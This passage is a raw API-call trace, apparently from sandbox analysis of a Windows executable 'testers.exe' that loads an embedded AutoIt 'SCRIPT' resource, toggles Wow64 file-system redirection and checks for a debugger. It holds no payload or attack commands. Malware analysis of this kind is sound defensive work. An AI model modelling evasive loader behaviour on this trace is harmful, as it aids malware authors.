(HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851e0 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc851f0 [0261.004] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85600 [0261.004] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85200 [0261.005] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc72288 [0261.005] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0261.005] OleInitialize (pvReserved=0x0) returned 0x0 [0261.013] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.014] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85618 [0261.014] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85220 [0261.014] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x93fdfc | out: phkResult=0x93fdfc*=0xf8) returned 0x0 [0261.014] RegQueryValueExW (in: hKey=0xf8, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x93fe18, lpcbData=0x93fe00*=0x8 | out: lpType=0x0, lpData=0x93fe18*=0x30, lpcbData=0x93fe00*=0x4) returned 0x0 [0261.014] RegCloseKey (hKey=0xf8) returned 0x0 [0261.014] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86390 [0261.014] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85230 [0261.014] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85240 [0261.014] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85250 [0261.014] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85648 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85260 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc863b8 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85270 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85660 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85280 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85678 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85290 [0261.015] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85690 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852a0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856a8 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852b0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856c0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852c0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856d8 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852d0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc856f0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852e0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85708 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc852f0 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85720 [0261.017] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85300 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85738 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85310 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85750 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85320 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85768 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85330 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85780 [0261.018] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85340 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85798 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85350 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857b0 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85360 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857c8 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85370 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857e0 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85380 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc857f8 [0261.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85390 [0261.019] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.019] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.021] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85810 [0261.021] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853a0 [0261.023] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91fdd0, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0261.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a578 [0261.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853b0 [0261.024] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x90fdc0, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0261.025] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85810 | out: hHeap=0xc60000) returned 1 [0261.025] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a5d0 [0261.025] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a578 | out: hHeap=0xc60000) returned 1 [0261.025] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853b0 | out: hHeap=0xc60000) returned 1 [0261.025] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x91fddc, lpFilePart=0x92fddc | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x92fddc*="testers.exe") returned 0x20 [0261.025] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc863e0 [0261.025] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85810 [0261.025] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85828 [0261.025] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853b0 [0261.025] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x92fdf8 | out: phkResult=0x92fdf8*=0x0) returned 0x2 [0261.025] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85828 | out: hHeap=0xc60000) returned 1 [0261.025] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853b0 | out: hHeap=0xc60000) returned 1 [0261.026] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.026] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.026] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.027] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85828 [0261.027] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853b0 [0261.027] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.027] IsThemeActive () returned 0x1 [0261.027] SystemParametersInfoW (in: uiAction=0x2000, uiParam=0x0, pvParam=0x93fe1c, fWinIni=0x0 | out: pvParam=0x93fe1c) returned 1 [0261.027] SystemParametersInfoW (in: uiAction=0x2001, uiParam=0x0, pvParam=0x0, fWinIni=0x2 | out: pvParam=0x0) returned 1 [0261.027] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85840 [0261.027] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853c0 [0261.027] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x92fdf0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0261.027] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85858 [0261.027] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853d0 [0261.027] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x90fd50, nSize=0x7fff | out: lpFilename="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe")) returned 0x20 [0261.028] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a578 [0261.028] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0261.030] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8ffd40, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0261.030] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73348 | out: hHeap=0xc60000) returned 1 [0261.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a628 [0261.030] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a578 | out: hHeap=0xc60000) returned 1 [0261.030] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0261.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xc722d0 [0261.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0261.030] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0261.030] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0261.031] Wow64DisableWow64FsRedirection (in: OldValue=0x91fd54 | out: OldValue=0x91fd54*=0x0) returned 1 [0261.031] FreeLibrary (hLibModule=0x75990000) returned 1 [0261.031] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xc8a578 [0261.031] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe" (normalized: "c:\\progra~2\\common~1\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x91fbf0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0261.031] GetFileType (hFile=0xf8) returned 0x1 [0261.032] LoadLibraryExW (lpLibFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0261.032] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0261.032] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0261.032] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0261.032] FreeLibrary (hLibModule=0x75990000) returned 1 [0261.032] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xc8a680 [0261.033] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853f0 [0261.033] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x91fdb0 | out: ppstm=0x91fdb0*=0xc86430) returned 0x0 [0261.034] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0261.034] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0261.034] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0261.034] LockResource (hResData=0x3607b8) returned 0x3607b8 [0261.034] ISequentialStream:RemoteWrite (in: This=0xc86430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0261.034] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0261.035] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.035] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0xc8a680, cb=0x18, pcbRead=0x91fcdc | out: pv=0xc8a680*=0xa3, pcbRead=0x91fcdc*=0x18) returned 0x0 [0261.035] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0261.035] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91fd20, cb=0x4, pcbRead=0x91fcdc | out: pv=0x91fd20*=0x45, pcbRead=0x91fcdc*=0x4) returned 0x0 [0261.035] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853f0 | out: hHeap=0xc60000) returned 1 [0261.035] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a680 | out: hHeap=0xc60000) returned 1 [0261.036] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91fd44, cb=0x10, pcbRead=0x91fd1c | out: pv=0x91fd44*=0x4d, pcbRead=0x91fd1c*=0x10) returned 0x0 [0261.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x91fc18 | out: lpSystemTimeAsFileTime=0x91fc18*(dwLowDateTime=0x3d04bed0, dwHighDateTime=0x1d661be)) [0261.036] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.036] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0261.036] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91f698, cb=0x4, pcbRead=0x91f45c | out: pv=0x91f698*=0x6b, pcbRead=0x91f45c*=0x4) returned 0x0 [0261.036] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x91f358 | out: lpSystemTimeAsFileTime=0x91f358*(dwLowDateTime=0x3d04bed0, dwHighDateTime=0x1d661be)) [0261.036] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91f6a0, cb=0x4, pcbRead=0x91f45c | out: pv=0x91f6a0*=0xa6, pcbRead=0x91f45c*=0x4) returned 0x0 [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91f488, cb=0x34, pcbRead=0x91f45c | out: pv=0x91f488*=0xe1, pcbRead=0x91f45c*=0x34) returned 0x0 [0261.037] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x91f358 | out: lpSystemTimeAsFileTime=0x91f358*(dwLowDateTime=0x3d04bed0, dwHighDateTime=0x1d661be)) [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91f6a0, cb=0x4, pcbRead=0x91f45c | out: pv=0x91f6a0*=0x17, pcbRead=0x91f45c*=0x4) returned 0x0 [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91f6cc, cb=0x6e, pcbRead=0x91f45c | out: pv=0x91f6cc*=0xf9, pcbRead=0x91f45c*=0x6e) returned 0x0 [0261.037] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x91f358 | out: lpSystemTimeAsFileTime=0x91f358*(dwLowDateTime=0x3d04bed0, dwHighDateTime=0x1d661be)) [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91fd53, cb=0x1, pcbRead=0x91f6a4 | out: pv=0x91fd53*=0x0, pcbRead=0x91f6a4*=0x1) returned 0x0 [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91fd4c, cb=0x4, pcbRead=0x91f6a4 | out: pv=0x91fd4c*=0xbc, pcbRead=0x91f6a4*=0x4) returned 0x0 [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91fd4c, cb=0x4, pcbRead=0x91f6a4 | out: pv=0x91fd4c*=0xbc, pcbRead=0x91f6a4*=0x4) returned 0x0 [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0x91fd4c, cb=0x4, pcbRead=0x91f6a4 | out: pv=0x91fd4c*=0x84, pcbRead=0x91f6a4*=0x4) returned 0x0 [0261.037] IStream:RemoteSeek (in: This=0xc86430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.037] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xc853f0 [0261.037] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xc85400 [0261.037] ISequentialStream:RemoteRead (in: This=0xc86430, pv=0xc85400, cb=0x0, pcbRead=0x91f6a4 | out: pv=0xc85400*=0x6e, pcbRead=0x91f6a4*=0x0) returned 0x0 [0261.037] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x91f5a0 | out: lpSystemTimeAsFileTime=0x91f5a0*(dwLowDateTime=0x3d04e5e0, dwHighDateTime=0x1d661be)) [0261.037] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853f0 | out: hHeap=0xc60000) returned 1 [0261.037] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc85400 | out: hHeap=0xc60000) returned 1 [0261.037] CloseHandle (hObject=0xf8) returned 1 [0261.038] IUnknown:Release (This=0xc86430) returned 0x0 [0261.038] FreeLibrary (hLibModule=0x290000) returned 1 [0261.038] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc722d0 | out: hHeap=0xc60000) returned 1 [0261.038] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0261.038] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73318 | out: hHeap=0xc60000) returned 1 [0261.038] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x50) returned 0xc8a680 [0261.038] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0261.038] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86430 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86458 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73348 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85400 [0261.039] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73348 | out: hHeap=0xc60000) returned 1 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc864a8 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73348 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc85870 [0261.039] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc86430 | out: hHeap=0xc60000) returned 1 [0261.039] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a6f0 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a708 [0261.039] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853f0 [0261.040] RtlSizeHeap (HeapHandle=0xc60000, Flags=0x0, MemoryPointer=0xc83138) returned 0x80 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86430 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a720 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85410 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a738 [0261.040] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0261.040] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a6f0 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85420 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xc8aad8 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85430 [0261.040] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc8a750 [0261.040] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0261.040] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc853e0 | out: hHeap=0xc60000) returned 1 [0261.040] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73318 | out: hHeap=0xc60000) returned 1 [0261.040] IsDebuggerPresent () returned 0 [0261.040] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8ffd68, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0261.040] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x8ffd68, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0261.041] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0261.041] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x60) returned 0xc8acf8 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc853e0 [0261.042] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x8ffd38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0261.042] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc73318 | out: hHeap=0xc60000) returned 1 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x60) returned 0xc8ad60 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc864d0 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc73318 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc864f8 [0261.042] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85440 [0261.042] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0261.042] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0261.042] Wow64DisableWow64FsRedirection (in: OldValue=0x90fcd4 | out: OldValue=0x90fcd4*=0x0) returned 1 [0261.042] FreeLibrary (hLibModule=0x75990000) returned 1 [0261.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x90fb70, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0261.043] GetFileType (hFile=0xf8) returned 0x1 [0261.043] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0261.046] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0261.047] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0261.047] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0261.047] FreeLibrary (hLibModule=0x75990000) returned 1 [0261.047] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10000) returned 0xc8adc8 [0261.047] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc85450 [0261.047] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x90fd04 | out: ppstm=0x90fd04*=0xc86520) returned 0x0 [0261.047] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0261.047] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0261.047] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0261.047] LockResource (hResData=0x3607b8) returned 0x3607b8 [0261.047] ISequentialStream:RemoteWrite (in: This=0xc86520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0261.047] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0261.048] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0261.048] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0xc8adc8, cb=0x18, pcbRead=0x90fc5c | out: pv=0xc8adc8*=0xa3, pcbRead=0x90fc5c*=0x18) returned 0x0 [0261.048] IStream:RemoteSeek (in: This=0xc86520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0261.048] ISequentialStream:RemoteRead (in: This=0xc86520, pv=0x90fca0, cb=0x4, pcbRead=0x90fc5c | out: pv=0x90fca0*=0x45, pcbRead=0x90fc5c*=0x4) returned 0x0 [0261.048] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, 